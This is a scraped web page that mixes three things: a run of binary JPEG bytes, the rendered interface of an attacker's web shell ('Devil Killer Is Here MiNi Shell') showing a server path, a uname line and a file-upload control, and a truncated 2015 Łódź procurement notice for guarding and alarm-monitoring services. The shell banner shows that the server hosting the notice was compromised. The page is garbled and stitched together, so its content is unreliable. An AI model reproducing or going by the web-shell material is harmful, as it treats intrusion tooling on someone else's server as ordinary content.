JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151023/155425-N-2015.html

<p class="kh_header"><b>Łódź: Ochrona i dozór obiektów na terenie miasta Łodzi będących w zarządzie Zamawiającego w 2016 r., w podziale na pięć (5) części:
część I  -  ul. Pabianicka 49 m 14, ul. Siemiradzkiego 4/8, ul. Ciasna 19a,  ul. Paderewskiego 47,
część II -  ul. Municypalna 4, ul. Ustronna 47/49,
część III -  ul. Rogozińskiego 15/15a,
część IV - ul. Lubelska 9/11,
część V - ul. Przybyszewskiego 70 i ul. Milionowa 2a</b><br>
<b>Numer ogłoszenia: 155425 - 2015; data zamieszczenia: 23.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona i dozór obiektów na terenie miasta Łodzi będących w zarządzie Zamawiającego w 2016 r., w podziale na pięć (5) części:
część I  -  ul. Pabianicka 49 m 14, ul. Siemiradzkiego 4/8, ul. Ciasna 19a,  ul. Paderewskiego 47,
część II -  ul. Municypalna 4, ul. Ustronna 47/49,
część III -  ul. Rogozińskiego 15/15a,
część IV - ul. Lubelska 9/11,
część V - ul. Przybyszewskiego 70 i ul. Milionowa 2a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowią: usługi  ochrony i dozoru  obiektów na terenie miasta Łodzi będących w zarządzie Zamawiającego, w podziale na pięć (5) części:
część I  -  ul. Pabianicka 49 m 14, ul. Siemiradzkiego 4/8, ul. Ciasna 19a,  ul. Paderewskiego 47; część II -  ul. Municypalna 4, ul. Ustronna 47/49;
część III -  ul. Rogozińskiego 15/15a;część IV - ul. Lubelska 9/11;
część V - ul. Przybyszewskiego 70 i ul. Milionowa 2a;
   polegających na monitorowaniu systemów alarmowych, dozorze sygnałów gromadzonych i 
        przetwarzanych w urządzeniach telewizji przemysłowej, fizycznej ochronie oraz patrolowaniu      
        przez Specjalistyczne patrole Grup Interwencyjnych.


2. Zamawiający  dopuszcza  możliwość składania ofert częściowych na dowolne części postępowania:
      2.1.  Część I postępowania: ul. Pabianicka 49 m 14,  ul. Siemiradzkiego 4/8,  ul. Ciasna 19a - siedziba
           AZK, ul. Paderewskiego 47 - siedziba AZK - Całodobowe monitorowanie lokalnych systemów 
            alarmowych przy użyciu sprzętu do zdalnego monitorowania alarmów w tym central alarmowych 
            będących własnością Zamawiającego, w budynkach będących w zarządzie Zamawiającego oraz 
            podejmowanie interwencji przez Grupy Interwencyjne w przypadku naruszenia strefy chronionej 
            oraz włączania się sygnału o napadzie - nie dotyczy ul. Siemiradzkiego 4/8, ul. Pabianickiej 49 m.14.
 2.1.1. Ochrona całodobowego monitoringu w obiektach powinna być wykonywana poprzez:
1)	Podłączenie lokalnego systemu monitorującego alarmy w chronionych obiektach do Stacji Monitorowania Alarmów Wykonawcy;
2)	Całodobowe monitorowanie sygnałów przesyłanych z lokalnego systemu monitorującego alarmy i ich rejestrowanie w urządzeniach elektronicznych;
3)	W przypadku odebrania przez Stacje Monitorowania Alarmów (SMA) sygnału o włamaniu Wykonawca zobowiązany jest natychmiast (do piętnastu minut od chwili odebrania sygnału o bezpośrednim zagrożeniu chronionego obiektu) wysłać do miejsca zdarzenia Patrol Interwencyjny, który w jak najkrótszym czasie od momentu sygnału alarmowego, przybędzie w celu udaremnienia włamania lub zminimalizowania jego skutków oraz ochrony życia i zdrowia osób w nim przebywających;
            4)  Wykaz osób, które mają być powiadomione w przypadku zaistnienia szkody powstałej w mieniu
                  Zamawiającego, bądź w innych sytuacjach wymagających interwencji Zamawiającego,
                  stanowił będzie integralną część umowy;
            5)  W przypadku zdarzenia o charakterze przestępczym Wykonawca zobowiązany jest do 
      powiadomienia o tym fakcie Zamawiającego, bądź osobę przez niego upoważnioną i wezwania      
      go w razie konieczności do zabezpieczenia obiektu. W czasie oczekiwania na zabezpieczenie       
      obiektu przez Zamawiającego, bądź osobę przez niego upoważnioną, Wykonawca zapewni 
      bezpłatną ochronę przez dwie godziny. Jeżeli w czasie do 120 minut nie uda się powiadomić 
      Zamawiającego  lub osoby upoważnionej lub jeżeli mimo powiadomienia osoby te nie przybędą 
      do obiektu Wykonawca  zabezpieczy  obiekt ochroną fizyczną, według stawki określonej w       
      formularzu oferta, zgodnej z obowiązującymi przepisami, za jednego pracownika ochrony. 
  2.1.2. Wykonawca zobowiązany jest do przekazania w użytkowanie nadajników radiowych, które 
                zostaną zainstalowane w obiektach należących do Zamawiającego tj. w Łodzi, przy 
                ul. Ciasnej 19a, ul. Paderewskiego 47, ul. Siemiradzkiego 4/8 oraz ul. Pabianickiej 49 m. 14. 
                Nadajnik radiowy stanowi własność Wykonawcy i nie będzie przedmiotem zatrzymania 
                bądź zastawu. Po zakończeniu umowy nadajnik zostanie zwrócony Wykonawcy.
  2.1.3.  Interwencje podjęte przez Wykonawcę polegać będą  na:
        1) Niezwłocznym przybyciu na miejsce zdarzenia Grup Interwencyjnych;
  2) Zabezpieczeniu w zależności od konkretnej potrzeby,  obiektu chronionego i ewentualnie 
      zatrzymaniu sprawców włamania lub napadu;
  3) Powiadomieniu Zamawiającego o każdym naruszeniu strefy chronionej;
  4) Powiadomieniu Policji lub w razie potrzeby  innych służb komunalnych o zaistniałym 
       zdarzeniu i ewentualnej konieczności interwencji;
  5) powiadomieniu Policji w przypadku każdego zweryfikowanego sygnału o napadzie.
 2.1.4. Ustala się następujące godziny pracy pracowników Zamawiającego na terenie siedzib - obiektów 
               chronionych: ul. Ciasna 19a i ul. Paderewskiego 47:
                 poniedziałek: od godz. 6:15     do godz. 19:00,
                 wtorek:          od godz. 6:15      do godz. 20:30,
                 środa	    od godz. 6:15      do godz. 19:00,
                 czwartek	    od godz. 6:15      do godz. 19:00,
                 piątek             od godz. 6:15      do godz. 19:00.

2.2. Część II postępowania: ul. Municypalna 4, ul. Ustronna 47/49  - Całodobowy fizyczny dozór 
           sygnałów przesyłanych, gromadzonych i  przetwarzanych w elektronicznych urządzeniach telewizji 
           przemysłowej - obszarów i obiektów będących w zarządzie Zamawiającego.  
          1) Dozór będzie realizowany przez pracowników Wykonawcy w liczbie 1 osoba, 7 dni w tygodniu, 
              24 godziny na dobę; 
          2) Ochrona będzie realizowana przez kwalifikowanych pracowników ochrony fizycznej;                                                                
          3) W czasie realizacji usługi osoby chroniące obiekty muszą  posiadać identyfikator osobisty wraz z 
               numerem służbowym;
      4) Osoby chroniące obiekty będą wyposażone w środki przymusu bezpośredniego, w przypadkach, 
               gdy zezwalają na ich wyposażenie przepisy Ustawy o ochronie osób i mienia;
          5) W razie zagrożenia w ochranianych obiektach , Wykonawca zobowiązany jest podjąć czynności     
               zmierzające do zapobieżenia wystąpieniu szkody, a w razie jej zaistnienia do zapobieżenia 
               zwiększaniu jej rozmiarów i natychmiastowego powiadomienia Zamawiającego lub osoby 
               upoważnionej oraz właściwych służb publicznych,; 
          6) Wstępne dochodzenie w przypadku wystąpienia szkody odbywać się winno przy udziale 
               upoważnionych przedstawicieli Zamawiającego i Wykonawcy . Z czynności tych sporządza się 
               protokół, w którym określa się rodzaj szkody, wstępną wartość zniszczonych, uszkodzonych lub 
               skradzionych przedmiotów itp. Protokół winien być podpisany przez przedstawicieli Stron; 
           7) Materiały ze wstępnego postępowania wewnętrznego dotyczącego zdarzenia, posiadającego     
               znamiona przestępstwa, przekazuje się właściwym organom ścigania; 
           8) Wykonawca  zobowiązany jest wyposażyć pracowników ochrony w odpowiednie środki łączności     
                i komunikacji.
 2.3. Część III postępowania: ul. Rogozińskiego 15/15a - Całodobowy fizyczny dozór obszaru i obiektu  
            będącego w zarządzie Zamawiającego.
         1)  Dozór będzie realizowany przez pracowników Wykonawcy w liczbie 1 osoba, 7 dni w tygodniu, 
              24 godziny na dobę; 
          2) Ochrona będzie realizowana przez kwalifikowanych pracowników ochrony fizycznej;                                                                
          3) W czasie realizacji usługi osoby chroniące obiekt muszą  posiadać identyfikator osobisty wraz z 
               numerem służbowym;
      4) Osoby chroniące obiekty będą wyposażone w środki przymusu bezpośredniego, w przypadkach, 
               gdy zezwalają na ich wyposażenie przepisy Ustawy o ochronie osób i mienia;
          5) W razie zagrożenia w ochranianym obiekcie, Wykonawca zobowiązany jest podjąć czynności     
               zmierzające do zapobieżenia wystąpieniu szkody, a w razie jej zaistnienia do zapobieżenia 
               zwiększaniu jej rozmiarów i natychmiastowego powiadomienia Zamawiającego lub osoby 
               upoważnionej oraz właściwych służb publicznych; 
          6) Wstępne dochodzenie w przypadku wystąpienia szkody odbywać się winno przy udziale 
               upoważnionych przedstawicieli Zamawiającego i Wykonawcy. Z czynności tych sporządza się 
               protokół, w którym określa się rodzaj szkody, wstępną wartość zniszczonych, uszkodzonych lub 
               skradzionych przedmiotów itp. Protokół winien być podpisany przez przedstawicieli Stron; 
           7) Materiały ze wstępnego postępowania wewnętrznego dotyczącego zdarzenia, posiadającego     
               znamiona przestępstwa, przekazuje się właściwym organom ścigania; 
           8) Wykonawca  zobowiązany jest wyposażyć pracowników ochrony w odpowiednie środki łączności     
                i komunikacji.
2.4. Część IV postępowania: ul. Lubelska 9/11 - Fizyczny dozór i ochrona mienia obiektu będącego 
          siedzibą Zamawiającego, po godzinach pracy Zamawiającego oraz całodobowo w dni wolne od pracy 
          i świąteczne.
          1) Ochrona będzie realizowana przez kwalifikowanych pracowników ochrony fizycznej, przy 
               jednoosobowej obsłudze zmian;                                                                
          2) W czasie realizacji usługi osoby chroniące obiekt muszą  posiadać identyfikator osobisty wraz z 
               numerem służbowym;
          3) Wykonawca zobowiązany jest do pełnienia dozoru i ochrony mienia obiektu - zgodnie z                 
               określonymi poniżej czasowymi wymaganiami Zamawiającego: 
                poniedziałek:    od godz. 14:45   do godz. 09:15 dnia następnego,
                wtorek:             od godz. 16:45   do godz. 07:15 dnia następnego,
                środa:                od godz. 14:45   do godz. 07:15 dnia następnego,                    
                czwartek:          od godz. 14:45   do godz. 07:15 dnia następnego,
                piątek:               od godz. 14:45   do godz. 07:15 pierwszego dnia roboczego po dniach wolnych,
                w dni wolne od pracy oraz w dni świąteczne całodobowo, zakończenie w pierwszy dzień
                roboczy po dniu wolnym o godzinie 7:15 lub 9:15; 
          4) W razie zagrożenia w ochranianym obiekcie, Wykonawca zobowiązany jest podjąć czynności     
               zmierzające do zapobieżenia wystąpieniu szkody, a w razie jej zaistnienia do zapobieżenia 
               zwiększaniu jej rozmiarów i natychmiastowego powiadomienia Zamawiającego lub osoby 
               upoważnionej oraz właściwych służb publicznych. 
  2.5. Część V postępowania: ul. Przybyszewskiego 70 i ul. Milionowa 2a - Ochrona obiektów 
             będących w zarządzie Zamawiającego w zakresie patrolowania (podjazdów) 4 - razy w ciągu doby 
             do każdego obiektu (średnio co  około 6 godzin) przez specjalistyczne patrole Grup     
             Interwencyjnych ze szczególnym zwróceniem uwagi na oznaki włamania lub dokonywania prób 
             włamania do obiektów.
         1) Wykonawca zobowiązany jest do zainstalowania na chronionych obiektach systemu kontroli 
              obchodów; 
         2) Patrolowanie polega na dokonaniu zewnętrznych oględzin obiektu ze szczególnym zwróceniem 
              uwagi na oznaki włamania lub dokonywania prób włamania do obiektów;
         3) W przypadku wykrycia w trakcie patrolu próby włamania należy podjąć interwencję, która ma na 
              celu zapobieżenie zwiększeniu szkody na mieniu Zamawiającego przez:
 a) ujęcia ewentualnego sprawcy przestępstwa i oddanie go w ręce Policji, a także zabezpieczenia 
    obiektów do czasu przybycia przedstawiciela Zamawiającego;
 b) w przypadku zbiorowego napadu rabunkowego podjąć wszelkie mieszczące się w 
     granicach prawa działania zmierzające do eliminacji zagrożeń oraz współdziałanie z Policją.
         4)  Informacje o przeprowadzonych interwencjach bądź próbach włamania Wykonawca  jest 
              zobowiązany przekazywać w formie notatki służbowej Zamawiającemu;
 a) W przypadku wykrycia w trakcie patrolu włamania lub próby włamania Wykonawca powiadomi 
      Zamawiającego lub osobę przez niego upoważnioną oraz zabezpieczy obiekt do jego przybycia. 
     Zamawiający  lub osoba upoważniona jest zobowiązana do stawienia się w chronionym obiekcie 
     w czasie nie dłuższym niż 120 minut od momentu powiadomienia;
 b) Wykaz osób, które mają być powiadomione w przypadku zaistnienia szkody powstałej w mieniu
      Zamawiającego, bądź w innych sytuacjach wymagających interwencji Zamawiającego,
      stanowił będzie integralną część umowy;
 c)  Jeżeli w czasie do 120 minut nie uda się powiadomić Zamawiającego  lub osoby upoważnionej 
       lub jeżeli mimo powiadomienia osoby te nie przybędą do obiektu Wykonawca  zabezpieczy 
      obiekt ochroną fizyczną, według stawki określonej w formularzu oferta, zgodnej z 
       obowiązującymi przepisami, za jednego pracownika ochrony.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku Wykonawca powinien wykazać, że posiada koncesję  na prowadzenie działalności gospodarczej w zakresie: ochrony osób i mienia wydanej przez MSWiA na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2014 r. poz. 1099).                                                                                                                                                                                              Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie: (spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełnienia warunku Wykonawca powinien wykazać, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 usługi podobnej do objętych przedmiotem zamówienia o porównywalnej wartości jak wartość składanej oferty. Za usługę podobną do objętej niniejszym postępowaniem Zamawiający uznaje:
1.1. Dla części I - monitorowanie systemów alarmowych, o wartości co najmniej równej składanej ofercie.
1.2. Dla części II, III i IV - dozór fizyczny obiektu, o wartości co najmniej równej składanej ofercie.
1.3. Dla części V - patrolowanie obiektów, o wartości co najmniej równej składanej ofercie.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie: (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku, wymaga w tym zakresie tylko oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie warunku Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadały kwalifikacje pracowników ochrony fizycznej: 
1.1. Dla części I - co najmniej 2 osoby,
1.2.Dla części II - co najmniej 4 osoby,
1.3.Dla części III - co najmniej 2 osoby,
1.4.Dla części IV  - co najmniej 2 osoby,
1.5.Dla części V  - co najmniej 2 osoby.
      2. Wszyscy pracownicy ochrony uczestniczący w realizacji zamówienia  muszą  być pracownikami 
      ochrony, niekaranymi oraz odpowiednio przeszkolonymi oznaczonymi w  sposób umożliwiający 
      ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3. W celu wykazania spełnienia warunku Wykonawca powinien przedłożyć:
3.1. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - zał. od nr 5 do 5d, do SIWZ.
3.2. oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz kwalifikacje pracowników ochrony fizycznej - zał. nr 6 do SIWZ.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie: (spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wymagane jest wykazanie przez Wykonawcę posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia minimum na kwotę: 500 000,00 zł. W celu potwierdzenia spełnienia wskazanego warunku Wykonawca przedstawia polisę wraz z dowodem jej opłacenia lub inny dokument w sposób nie budzący wątpliwości potwierdzający objęcie ochroną ubezpieczeniową. W przypadku braku dowodu opłacenia polisy OC Wykonawca składa oświadczenie, w którym potwierdza, iż przedłożona przez niego polisa OC jest ważna i została opłacona - wg stanu na dzień składania ofert. 
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie: (spełnia/nie spełnia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
